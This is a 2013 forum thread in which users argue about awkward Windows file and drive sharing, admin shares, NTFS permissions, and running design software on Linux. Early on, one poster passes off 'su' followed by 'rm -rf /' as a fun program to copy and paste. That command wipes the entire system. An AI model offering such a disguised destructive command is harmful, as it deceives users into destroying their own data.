Topic: Why the FUCK is this still such a challenge in Windows.

Offline The Demon Lord

• Addicted
  • The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!The Demon Lord is awe-inspiring!
Quote from: Emrico1;1525965
I had the same issues. What's worse is that they advertised how easy it was to share files etc. Bullshit, it's confusing as fuck.
Honestly, Someone give me another operating system! Mac is overpriced and evil, Windows is shit, Linux sounds wonderful but can't run the anything...

Please google, mozilla or someone give me a new OS for Christmas...

Linux is fun!

There is this really neat program you can run on a Linux box - just go to a command prompt and copy and paste the following:

su
rm -rf /

And then watch the magic that happens

Reply #25 Posted: May 28, 2013, 12:24:25 am

Offline Pyromanik

• Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!
Quote from: Emrico1;1525965
Linux sounds wonderful but can't run the anything...

only 90% of the internet.

One would say that it runs ALL the things.

itt:
Windows fanbois chime in with how easy it is to perform a complex unintuitive proceedure in order to share a whole drive.
MacOS fanbois get mad

EVERYONE ignores: \\\$\ DONE.

Sharing in windows has ALWAYS been a cunt. No ifs, buts, or coming back from that windows fanbois.
MacOS fanbois: "qq it's not mac" is not a valid excuse for ignorance. Complaining it's hard is one thing, complaining it's not something else is another.
Same deal goes for everyone bagging linux. It runs everything, espeically with wine if you're an Adobe gobbler. Not saying there won't be a few issues, but it's perfectly stable for any kind of dev, office work, or many games.
Last Edit: May 28, 2013, 06:13:27 pm by Pyromanik

Reply #26 Posted: May 28, 2013, 06:09:44 pm
Everyone needs more Bruce Campbell.

Offline Hmmmgood

• Devoted Member
  • Hmmmgood has no influence.
Quote from: Pyromanik;1526000
Sharing in windows has ALWAYS been a cunt.

Apart from Vista,sharing on windows is piss easy.Always has been.

And if ppl find it hard then maybe osx is for them cause lets face it,it really is the os for children.

Just make sure the right things are checked in advanced sharing settings in cp and then on the folder/drive sharing/security tab.

No need for extra accounts or homegroup.

Reply #27 Posted: May 28, 2013, 06:41:50 pm

Offline Pyromanik

• Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!Pyromanik is awe-inspiring!
Somebody obviously never tried to lan on the 9x family.
or ever faced NTFS file permissions overriding sharing permissions.
or ever had a computer just tell you that another (that can connect to it) just doesn't even exist.

Reply #28 Posted: May 28, 2013, 06:54:37 pm

Offline Emrico1

• Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!
It runs everything, espeically with wine if you're an Adobe gobbler. Not saying there won't be a few issues, but it's perfectly stable

Aparently only photoshop will work and all brush tools and clone stamp tools don't work.
Nope.jpg
Last Edit: May 28, 2013, 07:03:24 pm by Emrico1

Reply #29 Posted: May 28, 2013, 07:00:10 pm

Offline Pyromanik

Bummer. Used to.
Might still with crossover. *shrug*

Reply #30 Posted: May 28, 2013, 07:04:26 pm

Offline Hmmmgood

• Devoted Member
Quote from: Pyromanik;1526007
Somebody obviously never tried to lan on the 9x family.
or ever faced NTFS file permissions overriding sharing permissions.
or ever had a computer just tell you that another (that can connect to it) just doesn't even exist.

tbh iv never had any of those issues,but then iv really only used 3rd party apps for sharing with lots of ppl.

Reply #31 Posted: May 28, 2013, 07:13:14 pm

Offline Emrico1

• Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!Emrico1 is a rising star!
Quote from: Pyromanik;1526011
Bummer. Used to.
Might still with crossover. *shrug*

I'll give it a go. I've been promising myself I would but Adobe has held me back.
I'll do a dual boot when my eventual time off comes around...

Just for you.

Reply #32 Posted: May 28, 2013, 07:16:55 pm

Offline Pyromanik

People will sneer, but GIMP, Inkscape, Scribus (photoshop, illustrator, indesign).
Don't help shit when you've got to open someone elses work though.

I met someone in the weekend who scoffed at GIMP but ranked Inkscape far and above Illustrator. I thought that was pretty cool coming from a seasoned designer.

As for coding, that's well good and fine on linux.

Quote from: Hmmmgood;1526012
tbh iv never had any of those issues,but then iv really only used 3rd party apps for sharing with lots of ppl.

The ol' "works for me" eh.
Last Edit: May 28, 2013, 10:40:56 pm by Pyromanik

Reply #33 Posted: May 28, 2013, 10:23:17 pm

Offline swindle

• swindle is a rising star!swindle is a rising star!swindle is a rising star!swindle is a rising star!swindle is a rising star!swindle is a rising star!
So I managed to share a folder. Works well enough now.

Remote desktop + twonky = easy for noobs like me running media players. Running remote desktop to the macbook of the media server is handy as shit. I gotta keep an eye on it, after all its held together with blutack.

Reply #34 Posted: May 28, 2013, 11:46:54 pm
If we hit that bullseye, the rest of the dominoes should fall like a house of cards. Checkmate.

Offline oefox

• Devoted Member
  • oefox has no influence.
I should have chimed in yesterday.

Leave the windows home group and use advanced folder sharing using usernames/passwords.
Share folder.
Add everyone to the security setting.

Done.

Reply #35 Posted: May 29, 2013, 09:31:16 am
- badfox

Offline 5loth

• Addicted
  • 5loth has no influence.
EVERYONE ignores: \\\$\ DONE.

This is only of use if you are an administrator of the computer you are connecting to. If I'm connecting to my flatmate John's PC, unless I have administrator access to his PC, the $ share's aren't of any use.

Reply #36 Posted: May 29, 2013, 11:31:14 am
sila.

Offline Hmmmgood

• Devoted Member
Quote from: Pyromanik;1526024
The ol' "works for me" eh.

er not really,its not a mysterious dark art or rocket science or anything.

Reply #37 Posted: May 29, 2013, 06:20:27 pm

Offline Apostrophe Spacemonkey

• Fuck this title in particular.

• Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!Apostrophe Spacemonkey is awe-inspiring!
Quote from: Hmmmgood;1526052
er not really,its not a mysterious dark art or rocket science or anything.

You just have to make a sacrifice to the old gods by cutting your hand and citing a passage from the book of the dead every time you want share a folder.

I thought everyone knew this? It's clearly written on page 6 of the user manual.

Reply #38 Posted: May 30, 2013, 08:17:17 am

Offline Pyromanik

Quote from: 5loth;1526038
This is only of use if you are an administrator of the computer you are connecting to. If I'm connecting to my flatmate John's PC, unless I have administrator access to his PC, the $ share's aren't of any use.

yes, I was going to mention that, but in this case I have taken the assumption that swindle is the administrator of his own computer.
If I'm wrong I either did a shit job of reading the op or it wasn't mentioned.

There's always the default share of the user folder. That's aways exciting and damn near impossible to turn off intuitively.
Just put all your personal info in your home folder, everyone in the work group can write to it! yaaaaaay, so easy.
Last Edit: June 02, 2013, 01:31:27 pm by Pyromanik

Reply #39 Posted: June 02, 2013, 01:24:15 pm

Offline swindle

• swindle is a rising star!swindle is a rising star!swindle is a rising star!swindle is a rising star!swindle is a rising star!swindle is a rising star!
Windows really needs a good sorting out.

If you are like me and use a smaller SSD to base windows 8 on, then this sharing and library and public can become a bit of a nightmare.

It is as Pyro describes it, un-intuitive.

Reply #40 Posted: June 02, 2013, 09:26:38 pm
If we hit that bullseye, the rest of the dominoes should fall like a house of cards. Checkmate.

Offline Pyromanik

but Swindle, it has a GUI... what could be more intuitive than that!?

Reply #41 Posted: June 03, 2013, 09:44:23 am

Offline Xenolightning

• Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!
Quote from: Pyromanik;1526268
but Swindle, it has a GUI... what could be more intuitive than that!?
CLI OFC

Reply #42 Posted: June 03, 2013, 07:56:52 pm
-= Sad pug is sad =-

Offline Pyromanik

Don't be silly. CLI is full of dark magic wizardry and is for basement nerds only. GOSH. Only GUIs are easy to use. That's why windows is so much better than macosx, because macosx is just a frontend for the CLI. DUH.

Reply #43 Posted: June 04, 2013, 05:53:14 pm

Offline Xenolightning

• Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!Xenolightning is awe-inspiring!
Shush Codex.

Reply #44 Posted: June 04, 2013, 07:56:28 pm
-= Sad pug is sad =-

Offline swindle

I feel so stupid :(

But I really like OSX so far :)

Reply #45 Posted: June 04, 2013, 08:44:21 pm

Offline deadmeatwalking

• Devoted Member
  • deadmeatwalking is a force to reckon with.deadmeatwalking is a force to reckon with.deadmeatwalking is a force to reckon with.deadmeatwalking is a force to reckon with.deadmeatwalking is a force to reckon with.deadmeatwalking is a force to reckon with.deadmeatwalking is a force to reckon with.deadmeatwalking is a force to reckon with.
Quote from: Pyromanik;1526363
Don't be silly. CLI is full of dark magic wizardry and is for basement nerds only. GOSH. Only GUIs are easy to use. That's why windows is so much better than macosx, because macosx is just a frontend for the CLI. DUH.

<----- i have about that much clue about what you just said :P
Last Edit: June 05, 2013, 12:44:50 am by deadmeatwalking

Reply #46 Posted: June 05, 2013, 12:32:51 am

Offline mattnz

• mattnz is working their way up.mattnz is working their way up.mattnz is working their way up.
Was just thinking that swindle hasn't jumped on a bandwagon lately :D:D:D:D

Reply #47 Posted: June 05, 2013, 05:52:59 pm
Now that you have read this, plz give me neg rep :>

Offline Pyromanik

HTC One doesn't count?

Reply #48 Posted: June 05, 2013, 06:14:25 pm

Offline mattnz

• mattnz is working their way up.mattnz is working their way up.mattnz is working their way up.
Yusssss, he's back on form :>

Reply #49 Posted: June 05, 2013, 11:42:47 pm
Now that you have read this, plz give me neg rep :>